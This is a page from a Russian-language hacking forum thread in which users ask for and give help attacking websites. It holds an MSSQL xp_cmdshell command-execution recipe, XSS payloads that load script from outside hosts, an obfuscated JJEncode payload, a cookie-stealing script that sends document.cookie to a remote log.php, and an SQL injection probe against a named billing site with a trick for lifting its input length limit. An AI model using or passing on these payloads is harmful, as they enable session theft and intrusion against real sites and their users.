Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Пример можно(если можно) ? Конкретно ваш(с созданием таблицы и выводом).У меня на своей не выходит.
     
  2. [Raz0r]

    [Raz0r] Elder - Старейшина

    Joined:
    25 Feb 2007
    Messages:
    425
    Likes Received:
    484
    Reputations:
    295
    таблицу лучше создавать с полем id, чтобы было удобнее выводить результат:
    CREATE TABLE temp (id int IDENTITY, text nvarchar(8000));
    INSERT INTO temp exec master..xp_cmdshell dir;
    SELECT text FROM temp WHERE id = 1
     
    1 person likes this.
  3. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Пасип...).
     
  4. GenTao

    GenTao New Member

    Joined:
    10 Oct 2009
    Messages:
    123
    Likes Received:
    2
    Reputations:
    -3
    Что за ошибка такая ?

    type Exception report

    message

    description The server encountered an internal error () that prevented it from fulfilling this request.

    exception

    java.lang.NumberFormatException: For input string: "58'"
    java.lang.NumberFormatException.forInputString(NumberFormatException.java:48)
    java.lang.Integer.parseInt(Integer.java:456)
    java.lang.Integer.parseInt(Integer.java:497)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:627)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:729)
    com.evalica.util.http.upload.MultipartRequestFilter.doFilter(MultipartRequestFilter.java:28)
    com.evalica.cm.core.session.SessionCookieFilter.doFilter(SessionCookieFilter.java:47)


    note The full stack trace of the root cause is available in the Apache Tomcat/5.5.27 logs.

    Ошибка базы или сервера ?
     
  5. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    Ошибка ява-приложения.
    java.lang.NumberFormatException: For input string: "58'"
    Фактически сервер говорит, что переданная мне строка - не число.
     
  6. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    честно сказать такое в первые вижу:
    тут MSSQL или MYSQL ?
     
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    если есть надпись Microsoft - то явно не просто Mysql, как сам считаешь?
     
  8. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    а если есть надпись mysqld-4.0.20a-nt ?
     
    1 person likes this.
  9. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    MySQL
     
  10. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    http://ru.wikipedia.org/wiki/ODBC - от туда и надпись Microsoft
    А БД там MySQL.

    Ты так и не научился что либо читать, а по прежнему уверено отвечаешь на вопросы, которые сам не понимаешь.
     
    #10250 Grey, 23 Nov 2009
    Last edited: 23 Nov 2009
    1 person likes this.
  11. xofffff

    xofffff New Member

    Joined:
    15 Nov 2009
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    Ситуация в том что я нашел xss но при попытке засунуть ей вот этот скрипт
    PHP:
    <SCRIPT type="text/javascript" src="http://your_site.com/js.js"></SCRIPT>
    Нечего не происходит так как у него фильтр на " и %22 его аналог фильтр заключается в том что перед ним он ставит знак \ а именно
    PHP:
    <SCRIPT type=\"text/javascript\" src=\"http://your_site.com/js.js\"></SCRIPT>
    Его можно как нибудь обойти или это все?
    просто когда пишешь
    PHP:
    <script>alert(document.cookie)</script>
    Все показывает.
     
  12. [Forest]

    [Forest] New Member

    Joined:
    7 Nov 2009
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    ставь одинарные кавычки
     
  13. xofffff

    xofffff New Member

    Joined:
    15 Nov 2009
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    Опять ставит фильтр
    PHP:
    <SCRIPT type=\'text/javascript\' src=\'http://my_site.com/js.js\'></SCRIPT>
     
    #10253 xofffff, 23 Nov 2009
    Last edited: 23 Nov 2009
  14. [Forest]

    [Forest] New Member

    Joined:
    7 Nov 2009
    Messages:
    15
    Likes Received:
    4
    Reputations:
    0
    не уверен быдет ли пахать...

    add:

    http://sec-123.narod.ru/xss/HTML.txt
     
    #10254 [Forest], 23 Nov 2009
    Last edited: 23 Nov 2009
  15. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    2xofffff


    Попробуй так:
    Code:
    <script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+"\\"+$.$$$+$.$_$+"\\"+$.__$+$.$_$+$.$$_+$.$$$_+"\\"+$.__$+$.$$_+$.$$$+" \\"+$.__$+$.__$+$.__$+"\\"+$.__$+$.$_$+$.$_$+$.$_$_+"\\"+$.__$+$.$__+$.$$$+$.$$$_+"()\\"+$.$$$+$._$$+"\\"+$.__$+$.$_$+$.__$+"\\"+$.__$+$.$_$+$.$_$+"\\"+$.__$+$.$__+$.$$$+".\\"+$.__$+$.$$_+$._$$+"\\"+$.__$+$.$$_+$._$_+$.$$__+"\\"+$.$$$+$.$_$+"\\\"\\"+$.__$+$.$_$+$.___+$.__+$.__+"\\"+$.__$+$.$$_+$.___+"\\"+$.$$$+$._$_+"//"+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+".\\"+$.__$+$.$_$+$.___+$.__$+$.$$_+".\\"+$.__$+$.$$_+$._$_+$._+"/"+$.$$__+$.$_$$+"/\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+".\\"+$.__$+$.$_$+$._$_+"\\"+$.__$+$.$$_+$._$$+"\\\"\\"+$.$$$+$._$$+"\"")())();</script>
    
    Это закодированое

    Code:
    <script>img=new Image();img.src="http://alert.h16.ru/cb/js.js";</script>
    UPD:
    Хотя, если двойные кавычки под фильтром, то не выйдет, только что обратил внимание.

    Это к стати работает!
     
    #10255 Ins3t, 23 Nov 2009
    Last edited: 23 Nov 2009
    1 person likes this.
  16. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    не понял что ты имел ввиду под красным!!!

    Это чем же закодировано? Можно ли потом чтоб обйти двойные кавычки закодироват еще чем нибудь (hex, base64)?
     
    #10256 YuNi|[c, 23 Nov 2009
    Last edited: 23 Nov 2009
  17. Ins3t

    Ins3t Харьковчанин

    Joined:
    18 Jul 2009
    Messages:
    939
    Likes Received:
    429
    Reputations:
    139
    2YuNi|[c, если ты закодируешь это потом в бейс64 или хэкс - то вообще ничего пахать не будет.

    Инфа по сабжу:

    http://raz0r.name/news/xss-filters-bypass-on-blackhat/
    http://oxod.ru/2009/08/26/%D0%BE%D0%B1%D1%85%D0%BE%D0%B4-xss-%D1%84%D0%B8%D0%BB%D1%8C%D1%82%D1%80%D0%BE%D0%B2-%D0%BF%D0%BE-%D1%81%D1%80%D0%B5%D0%B4%D1%81%D1%82%D0%B2%D0%B0%D0%BC-%D0%BE%D1%81%D0%BE%D0%B1%D0%B5%D0%BD%D0%BE%D1%81/
    http://utf-8.jp/public/jjencode.html
     
    1 person likes this.
  18. xofffff

    xofffff New Member

    Joined:
    15 Nov 2009
    Messages:
    0
    Likes Received:
    3
    Reputations:
    0
    No input file specified.

    Написало когда ввел
    Code:
    ?username='><SCRIPT type=text/javascript src=http://alert.h16.ru/cb/js.js></SCRIPT></script>
    и куки написались в строке браузера но в base.php не сохранились :(

    В js.js у меня
    PHP:
    location.href =www.site.h16.ru/cb/log.php? + document.cookie;
    Кстати еще в строке браузера после того как я написал скрипт перешел на страничку слова No input file specified.
    Code:
    http://hacksite.com/log.php?и тут cookie
     
    #10258 xofffff, 24 Nov 2009
    Last edited: 24 Nov 2009
  19. superboys

    superboys Elder - Старейшина

    Joined:
    1 Feb 2008
    Messages:
    61
    Likes Received:
    3
    Reputations:
    1
    http://bill.svtc.ru/initlogin.php?CardNumber=1&CardCode='
    Помогите, незнаю как обойти количество символов :confused:
    Заранее спасибо
     
  20. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    В сурсе страницы рядом с name=CardCode изменяешь maxlength=12 на maxlength=999999. Только тольку с этого...
     
Thread Status:
Not open for further replies.